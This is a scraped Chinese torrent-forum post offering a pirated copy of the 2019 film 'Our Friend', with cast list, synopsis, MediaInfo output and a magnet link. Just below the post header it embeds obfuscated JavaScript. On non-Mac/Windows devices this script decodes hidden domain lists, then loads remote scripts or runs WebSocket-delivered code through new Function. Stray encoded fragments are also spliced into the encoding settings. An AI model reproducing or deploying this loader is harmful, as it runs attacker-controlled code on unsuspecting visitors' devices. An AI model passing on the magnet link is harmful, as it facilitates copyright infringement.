朋友[双语字幕]Our.Friend.2019.1080p.BluRay.x264.DTS-迅雷下载 12.47GB

版主小s 23天前 211

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 朋友 / Our Friend / 我们的朋友

◎片 名 The Friend

◎年 代 2019

◎产 地 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 2019-09-06(多伦多电影节) / 2021-01-22(美国)

◎IMDb评分 7.1/10 from 325 users

◎IMDb链接 https://www.imdb.com/title/tt9608818

◎豆瓣评分 0/10 from 0 users

◎豆瓣链接 https://movie.douban.com/subject/30432903/

◎片 长 124分钟

◎导 演 加芙列拉·考珀斯维特 Gabriela Cowperthwaite

◎编 剧 布拉德·英格尔斯比 Brad Ingelsby

◎主 演 达科塔·约翰逊 Dakota Johnson

杰森·席格尔 Jason Segel

卡西·阿弗莱克 Casey Affleck

格温多兰·克里斯蒂 Gwendoline Christie

切莉·琼斯 Cherry Jones

阿娜·欧蕾利 Ahna O'Reilly

维奥莱特·麦格劳 Violet McGraw

里德·戴蒙德 Reed Diamond

阿兹塔·加尼扎达 Azita Ghanizada

迈克尔·帕帕约翰 Michael Papajohn

里奇·蒙哥马利 Ritchie Montgomery

伊莎贝拉·瑞思 Isabella Rice

钱德勒·海德 Chandler Head

珍妮弗·皮尔斯·马尔萨斯 Jennifer Pierce Mathus

布伦达·柯林 Brenda Currin

T·C·马特恩 T.C. Matherne

杰洛米诺·斯芬克斯 Jeronimo Spinx

贾辛特 Jacinte Blankenship

Mike Lutz

Eric Schmitz

Bennett Wayne Dean Sr.

◎标 签 卡西·阿弗莱克 | CaseyAffleck | 剧情 | 达科塔·约翰逊 | 美国电影 | 美国 | 格温多兰·克里斯蒂 | 改编

◎简 介

根据马修·蒂格为《时尚先生》杂志撰写的获得国家杂志大奖的文章改编,布拉德·英格尔斯比操刀该剧本。故事讲述在得知伴侣妮可(约翰逊饰)只有六个月的生命后,马修(阿弗莱克饰)意外地得到了他们最好朋友(席格尔饰)的支持。他搬到了他们家,暂时搁置了自己的生活。

  1. General

  2. Unique ID : 208267967573850450786512696795800490186 (0x9CAEF396DC8FB88F3CAF3607D77350CA)

  3. Complete name : Our.Friend.2019.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.5 GiB

  7. Duration : 2 h 5 min

  8. Overall bit rate : 14.2 Mb/s

  9. Encoded date : UTC 2021-07-09 02:21:32

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 2 h 5 min

  22. Bit rate : 12.6 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 036 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.264

  33. Stream size : 11.1 GiB (89%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=8 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.85 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 5 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 1.32 GiB (11%)

  54. Title : eng

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 57 min

  65. Bit rate : 52.5 kb/s

  66. Count of elements : 2003

  67. Stream size : 44.1 MiB (0%)

  68. Title : chs&eng

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 57 min

  79. Bit rate : 52.8 kb/s

  80. Count of elements : 2003

  81. Stream size : 44.4 MiB (0%)

  82. Title : cht&eng

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 57 min

  93. Bit rate : 32.0 kb/s

  94. Count of elements : 2003

  95. Stream size : 26.9 MiB (0%)

  96. Title : chs

  97. Language : Chinese

  98. Default : No

  99. Forced : No


  100. Text #4

  101. ID : 6

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 57 min

  107. Bit rate : 32.3 kb/s

  108. Count of elements : 2003

  109. Stream size : 27.1 MiB (0%)

  110. Title : cht

  111. Language : Chinese

  112. Default : No

  113. Forced : No


  114. Menu

  115. 00:00:00.000 : 第 01 章

  116. 00:12:52.916 : 第 02 章

  117. 00:28:12.708 : 第 03 章

  118. 00:46:37.916 : 第 04 章

  119. 01:03:11.666 : 第 05 章

  120. 01:15:45.833 : 第 06 章

  121. 01:30:23.958 : 第 07 章

  122. 01:43:28.333 : 第 08 章

  123. 01:59:45.458 : 第 09 章



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:8EA2E46C1BC2B85562B8C78D4F90AD1685C11999
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖